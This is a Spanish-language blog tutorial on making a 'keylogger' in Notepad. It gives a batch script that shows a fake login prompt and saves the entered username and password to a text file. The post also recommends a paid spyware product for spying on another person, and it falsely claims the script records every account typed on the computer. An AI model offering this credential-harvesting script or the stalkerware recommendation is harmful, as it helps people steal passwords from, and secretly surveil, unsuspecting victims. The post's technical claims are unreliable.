Ad Code

Cómo crear un keylogger usando el bloc de notas

El keylogger es una de las herramientas más antiguas usadas por los hackers y que hoy en día aún se siguen usando, pero en sí que es el Keylogger? pues bien se trata de un tipo de herramienta capaz de conservar información detallada de cuentas de usuario y contraseñas alojadas en un dispositivo seleccionado. Esta estrategia ilícita puede violar protocolos de seguridad sin que los usuarios puedan notarlo o esconder la información para ser vista luego por quienes hayan acudido a esta práctica. 

Un keylogger es un tipo de software espía que registra todas las pulsaciones del teclado sin que la “victima” se dé cuenta; es muy utilizado por ciberdelincuentes para obtener información de cuentas bancarias y tarjetas de crédito, datos como nombres de usuario, contraseñas y otra información personal. En síntesis un keylogger “graba” todo lo que se teclea, posteriormente envía el archivo donde se guardó toda la información a un servidor que el ciberdelincuente ha especificado.

www.dominatupc.com.co 624x352

Cabe destacar que los keylogger pueden ser de dos tipos, uno que se puede agregar de forma física al en el hardware y los programáticos que se incluyen directamente en la matriz del disco duro mediante estrategias digitales como software espía que pueden afectar el funcionamiento de las computadoras. esta publicación se hace teniendo en cuenta el Hacking ético, sin embargo para quienes desean un keylogger para espiar otra persona, les recomendamos una opción de pago muy buena conocida como FlashCrestISpy, un keylogger que permite espiar diariamente los movimientos digitales de una persona incauta.

Pasos para  crear un Keylogger usando el bloc de notas

Inicia el proceso abriendo el Bloc de notas y pegando el siguiente código:
@echo off 
color a 
title Keylogger 
cls 
echo Por favor ingresa tu correo y contraseña 
echo. 
echo. 
cd “C:Logs” 
set /p user=Usuario: 
set /p pass=Contraseña: 
echo Usuario =”%user%” Contraseña =”%pass%” >> Registro.txt 
start >>Program Here<< 
exit

Luego debes proceder a guardar el archivo en "Guardar como" y nombrarlo como Key.bat y seleccionar todos los archivos en la opción "Tipo" luego de guardar el archivo, procede a abrirlo y veras como un archivo de texto se abrirá conteniendo los usuarios y contraseñas digitadas en el equipo, y así sucederá cuando se tecleen nuevas cuentas de usuario. 

Tenga en cuenta que este tutorial solo se dirige a personas que deseen conocer cómo funcionan los keylogger de forma básica, si desean conocer mucho más sobre temáticas de piratería informática y hacking pueden revisar posts relacionados en nuestra barra de noticias y publicaciones relacionadas. Lee también:(Cómo activar el HTTPS en cualquier blog de blogger